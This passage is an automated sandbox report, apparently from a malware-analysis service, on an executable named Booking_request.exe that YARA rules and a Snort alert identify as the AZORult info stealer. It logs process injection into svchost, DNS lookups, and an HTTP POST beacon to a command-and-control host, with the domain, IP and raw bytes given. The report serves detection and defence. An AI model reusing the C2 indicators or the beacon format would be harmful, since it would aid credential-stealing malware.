                                Name | RVA | Size | Type | Language | Country
                                AFX_DIALOG_LAYOUT | 0x611ac | 0x2 | data | Russian | Russia
                                RT_ICON | 0x611b0 | 0x94a8 | data | |
                                RT_DIALOG | 0x6a658 | 0x114 | data | Russian | Russia
                                RT_GROUP_ICON | 0x6a76c | 0x14 | MS Windows icon resource - 1 icon | |
                                RT_MANIFEST | 0x6a780 | 0xf47 | XML document text | English | United States

                                Imports

                                DLL | Import
                                KERNEL32.dll | GetCommandLineW, GetCurrentProcess, GetSystemDefaultUILanguage, GetThreadLocale, GetUserDefaultUILanguage, GetCurrentThreadId, GetSystemDefaultLangID, GetACP, GetCommandLineA, GetLastError, GetThreadUILanguage, GetCurrentThread, SwitchToThread, GetCurrentProcessorNumber, GetErrorMode, GetCurrentProcessId, GetProcessHeap, GetTickCount, GetEnvironmentStringsW, VirtualAlloc, HeapAlloc, WriteFile, CreateFileW, CloseHandle, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RaiseException, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, HeapFree, GetFileType, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, WriteConsoleW
                                USER32.dll | GetActiveWindow, GetFocus, GetDialogBaseUnits, GetMessageTime, GetDesktopWindow, GetForegroundWindow, GetShellWindow
                                SHELL32.dll | ShellExecuteA

                                Possible Origin

                                Language of compilation system | Country where language is spoken | Map
                                Russian | Russia |
                                English | United States |

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                02/24/20-11:06:12.243955 | TCP | 2029466 | ET TROJAN Win32/AZORult V3.3 Client Checkin M1 | 49843 | 80 | 192.168.2.3 | 45.147.197.20

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Feb 24, 2020 11:06:12.206954002 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20
                                Feb 24, 2020 11:06:12.242808104 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.243091106 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20
                                Feb 24, 2020 11:06:12.243954897 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20
                                Feb 24, 2020 11:06:12.279860973 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.282928944 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.283068895 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.283102036 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.283113003 CET | 80 | 49843 | 45.147.197.20 | 192.168.2.3
                                Feb 24, 2020 11:06:12.283130884 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20
                                Feb 24, 2020 11:06:12.285011053 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20
                                Feb 24, 2020 11:06:13.328694105 CET | 49843 | 80 | 192.168.2.3 | 45.147.197.20

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Feb 24, 2020 11:05:36.468585968 CET | 56796 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:36.517055988 CET | 53 | 56796 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:39.736383915 CET | 53425 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:39.778206110 CET | 53 | 53425 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:39.952039957 CET | 62153 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:39.985680103 CET | 53 | 62153 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:40.759938955 CET | 64848 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:40.793720007 CET | 53 | 64848 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:41.767611027 CET | 52368 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:41.792915106 CET | 53 | 52368 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:41.825467110 CET | 55161 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:41.876779079 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:42.724617004 CET | 61263 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:42.749861002 CET | 53 | 61263 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:45.785841942 CET | 57411 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:45.942719936 CET | 53 | 57411 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:05:49.947978020 CET | 58272 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:05:49.973356009 CET | 53 | 58272 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:12.153839111 CET | 49907 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:12.187583923 CET | 53 | 49907 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:18.063348055 CET | 53625 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:18.088736057 CET | 53 | 53625 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:18.763938904 CET | 53327 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:18.789227009 CET | 53 | 53327 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:18.839534044 CET | 55279 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:18.864876032 CET | 53 | 55279 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:23.164398909 CET | 62778 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:23.189733028 CET | 53 | 62778 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:34.412707090 CET | 51420 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:34.457128048 CET | 53 | 51420 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:06:35.711301088 CET | 63844 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:06:35.746351004 CET | 53 | 63844 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:07:01.139295101 CET | 61605 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:07:01.164657116 CET | 53 | 61605 | 8.8.8.8 | 192.168.2.3
                                Feb 24, 2020 11:07:01.789745092 CET | 50594 | 53 | 192.168.2.3 | 8.8.8.8
                                Feb 24, 2020 11:07:01.833506107 CET | 53 | 50594 | 8.8.8.8 | 192.168.2.3

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Feb 24, 2020 11:06:12.153839111 CET | 192.168.2.3 | 8.8.8.8 | 0x1bb6 | Standard query (0) | sh1006535.had.su | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Feb 24, 2020 11:06:12.187583923 CET | 8.8.8.8 | 192.168.2.3 | 0x1bb6 | No error (0) | sh1006535.had.su | | 45.147.197.20 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • sh1006535.had.su

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.3 | 49843 | 45.147.197.20 | 80 | C:\Windows\SysWOW64\svchost.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Feb 24, 2020 11:06:12.243954897 CET | 193 | OUT | POST /index.php HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                Host: sh1006535.had.su
                                Content-Length: 105
                                Cache-Control: no-cache
                                Data Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec
                                Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
                                Feb 24, 2020 11:06:12.282928944 CET | 194 | IN | HTTP/1.1 403 Forbidden
                                Server: ngjit
                                Connection: keep-alive
                                Keep-Alive: timeout=60
                                Set-Cookie: __ddg1=MYXn5XsuOzWLl2hoUqNt; Domain=.had.su; HttpOnly; Path=/; Expires=Tue, 23-Feb-2021 10:06:12 GMT
                                Date: Mon, 24 Feb 2020 10:06:12 GMT
                                Content-Type: text/html
                                Content-Length: 3835
                                ETag: "5d7f691c-efb"
                                Feb 24, 2020 11:06:12.283068895 CET | 195 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 64 69 73 61 62 6c 65 64 20 62 79 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 3c 2f 74
                                Data Ascii: <!DOCTYPE html><html><head> <title>Account disabled by server administrator</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style> body { font-weight: normal; font-size: 11px; font-fam
                                Feb 24, 2020 11:06:12.283102036 CET | 197 | IN | Data Raw: 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30
                                Data Ascii: width: 14px; height: 14px; border-radius: 14px; margin: 0 auto; margin-top: 0px; } .fatal-error-message { font-size: 12px; overflow: hidden; padding: 0 10px; color: #fff; }
                                Feb 24, 2020 11:06:12.283113003 CET | 198 | IN | Data Raw: d1 8e d1 87 d0 b5 d0 bd 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 d0 be d0 bc 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b0 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20
                                Data Ascii: .</div> </div> </div> </div> <div class="b-copyright"> <a class="b-copyright__link" href="http://ispsystem.com/external/ispmanager.html" target="_blank">ISPsyste


                                Code Manipulations

                                Statistics

                                CPU Usage


                                Memory Usage


                                High Level Behavior Distribution


                                Behavior


                                System Behavior

                                General

                                Start time: 11:05:42
                                Start date: 24/02/2020
                                Path: C:\Users\user\Desktop\Booking_request.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\Booking_request.exe'
                                Imagebase: 0x940000
                                File size: 1569992 bytes
                                MD5 hash: FF17014CBB249E173309A9E1251E4574
                                Has administrator privileges: false
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation: low

                                General

                                Start time: 11:06:10
                                Start date: 24/02/2020
                                Path: C:\Windows\SysWOW64\svchost.exe
                                Wow64 process (32bit): true
                                Commandline: C:\Windows\System32\svchost.exe
                                Imagebase: 0x290000
                                File size: 44520 bytes
                                MD5 hash: FA6C268A5B5BDA067A901764D203D433
                                Has administrator privileges: false
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                Reputation: low
